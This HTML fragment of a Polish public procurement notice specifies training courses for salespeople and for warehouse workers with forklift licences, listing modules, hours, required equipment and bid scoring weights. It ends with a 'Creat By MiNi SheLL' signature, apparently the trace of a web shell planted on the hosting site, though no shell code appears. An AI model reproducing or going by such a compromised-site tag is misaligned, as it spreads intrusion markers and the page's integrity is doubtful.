2)	organizacja handlu w gospodarce rynkowej;
3)	marketing i reklama w handlu;
4)	wyposażanie punktu sprzedaży detalicznej;
5)	organizacja zaopatrzenia i przyjmowanie dostaw towarów;
6)	wykonywanie i dokumentowanie podstawowych obliczeń sklepowych;
7)	obsługa klienta, w tym trudnego klienta (nawiązanie kontaktu z klientem i wzbudzenie zaufania);
8)	skuteczne metody sprzedaży;
9)	negocjacje w sprzedaży;
10)	dekorowanie wnętrza sklepu i okna wystawowego.
Łącznie zagadnienia te powinny obejmować 160 godzin.
III. Obsługa kasy fiskalnej - 20 godzin (w tym 14 godzin zajęć praktycznych).
Wykonawca powinien zapewnić minimum 10 kas fiskalnych (z uwagi na ewentualne zwiększenie liczby uczestników szkolenia), aby podczas zajęć praktycznych na jedną kasę przypadały maksymalnie dwie osoby (kupujący-sprzedający).
IV. Obsługa komputera w zawodzie sprzedawcy, w tym:
  - obsługa komputera w zakresie podstawowym (środowisko Windows, wybrane zagadnienia z Pakietu Microsoft Office),
  - obsługa użytkowych programów komputerowych wykorzystywanych w sprzedaży i handlu (minimum dwa programy komputerowe handlowo-magazynowe - należy podać nazwy proponowanych programów komputerowych).
Łączna liczba godzin: 50 godz. 
Zajęcia z zakresu obsługi komputera powinny zostać przeprowadzone w jednym czasie z podziałem na dwie grupy liczące maksymalnie po 10 osób w każdej. Wykonawca powinien zagwarantować taką ilość komputerów jednocześnie, aby każdy uczestnik szkolenia miał zapewnione samodzielne stanowisko komputerowe. Należy zapewnić jednocześnie dwie pracownie komputerowe wyposażone w minimum 10 komputerów + 1 komputer dla instruktora zajęć w każdej pracowni, a więc łącznie 22 komputery (z uwagi na ewentualne zwiększenie liczby uczestników szkolenia).
V. Egzamin wewnętrzny - 2 godziny..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40.0</li>
<li>2. Program szkolenia i metodyka nauczania - 20.0</li>
<li>3. Kwalifikacje kadry dydaktycznej - 20.0</li>
<li>4. Baza lokalowa, jej wyposażenie, materiały i pomoce dydaktyczne - 15.0</li>
<li>5. Akredytacja kuratora oświaty na oceniany kierunek szkolenia - 5.0</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> KURS ZAWODU - MAGAZYNIER Z OBSŁUGĄ KOMPUTERA I Z UPRAWNIENIAMI DO OBSŁUGI WÓZKÓW JEZDNIOWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia jest przygotowanie uczestników szkolenia w zakresie:
   -  przestrzegania przepisów bezpieczeństwa i higieny pracy w magazynie, hurtowni,
   -  wykonywania odbioru towaru,
   -  właściwego przechowywania towarów,
   -  stosowania programów do obsługi gospodarki magazynowej,
   -  uzyskania przez uczestników szkolenia niezbędnych umiejętności praktycznych w zakresie samodzielnego obsługiwania wózków jezdniowych. 
Program szkolenia dla zawodu kierowca operator wózków jezdniowych powinien być opracowany lub zatwierdzony przez Ośrodek Doskonalenia Kadr w Mysłowicach, nadzorowany przez Ministra Gospodarki, i dodatkowo obejmować przeszkolenie w zakresie bezpiecznego użytkowania butli z gazem, w tym ich bezpiecznej wymiany w obsługiwanych wózkach jezdniowych. 
Program szkolenia powinien zawierać obowiązkowo następujące moduły szkoleniowe:
I. Trening umiejętności osobistych, w tym trening:
  - motywacyjny,
  - asertywności,
  - zarządzania sobą w czasie i efektywnej organizacji czasu pracy,
  - współpracy w zespole,
  - zarządzania emocjami i stresem.
Łącznie zagadnienia te powinny obejmować 18 godzin (6 godz. razy 3 dni).
UWAGA!  Trening umiejętności osobistych powinien zostać przeprowadzony na początku szkolenia, tj. przed przystąpieniem do realizacji pozostałych modułów tematycznych, w celu integracji grupy szkoleniowej i wzmocnienia motywacji 
do aktywnego uczestnictwa w szkoleniu. Trening umiejętności osobistych powinien być przeprowadzony przez trenera, trenerów rozwoju osobistego - posiadających certyfikat, akredytację coacha lub uprawnienia trenerskie, lub ukończone studia podyplomowe z zakresu coachingu.
II. Aktualne zagadnienia obejmujące wiedzę i umiejętności praktyczne w zawodzie magazyniera, w tym: 
1)	przestrzeganie zasad bezpieczeństwa i higieny pracy w magazynie/hurtowni,
2)	planowanie oraz sterowanie zapasami magazynowymi,
3)	organizacja zaopatrzenia i odbiór towarów (odbiór jakościowy i ilościowy),
4)	zasady poprawnego przechowywania towarów,
5)	kompletowanie towarów oraz ich wydawanie - wysyłka z magazynu,
6)	posługiwanie się dokumentacją magazynową,
7)	współpraca z dostawcami i klientami.
Łącznie zagadnienia te powinny obejmować 67 godzin.
III. Obsługa komputera w zawodzie magazyniera, w tym:
  - obsługa komputera w zakresie podstawowym (środowisko Windows, wybrane zagadnienia z Pakietu Microsoft Office),
  - obsługa użytkowych programów komputerowych do prowadzenia gospodarki magazynowej (minimum dwa programy komputerowe handlowo-magazynowe - należy podać nazwy proponowanych programów komputerowych).
Łączna liczba godzin: 50 godzin. Wykonawca powinien zagwarantować taką ilość komputerów jednocześnie, aby każdy uczestnik szkolenia miał zapewnione samodzielne stanowisko komputerowe. Należy zapewnić pracownię komputerową wyposażoną w minimum 10 komputerów + 1 komputer dla instruktora zajęć (łącznie 11 komputerów). 
IV. Obsługa wózków jezdniowych w transporcie wewnątrzzakładowym, w tym:
1)   przygotowanie wózka jezdniowego do zadań transportowych,
2)   organizowanie transportu wewnątrzzakładowego oraz bezpieczeństwo i higiena pracy przy eksploatacji wózków jezdniowych,
3)   samodzielne prowadzenie wózka i wykonywanie operacji manewrowych.
Łącznie 70 godzin na każdego uczestnika.
V. Egzamin na uzyskanie uprawnień do obsługi wózka jezdniowego: 5 godzin.
Miejsce odbywania zajęć praktycznych oraz stan i ilość maszyn (wózków) do realizacji zajęć praktycznych powinny gwarantować solidne przygotowanie uczestników do wykonywania zawodu objętego szkoleniem. Należy zapewnić minimum trzy sprawne wózki jezdniowe. Szkolenie powinno być przeprowadzone przez instytucję szkoleniową oraz wykładowców, instruktorów posiadających obowiązujące uprawnienia do prowadzenia tego rodzaju szkolenia, wydane przez Ośrodek Doskonalenia Kadr Ministerstwa Gospodarki i Pracy w Mysłowicach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40.0</li>
<li>2. Program szkolenia i metodyka nauczania - 20.0</li>
<li>3. Kwalifikacje kadry dydaktycznej - 20.0</li>
<li>4. Baza lokalowa, jej wyposażenie, materiały i pomoce dydaktyczne - 15.0</li>
<li>5. Akredytacja kuratora oświaty na oceniany kierunek szkolenia - 5.0</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com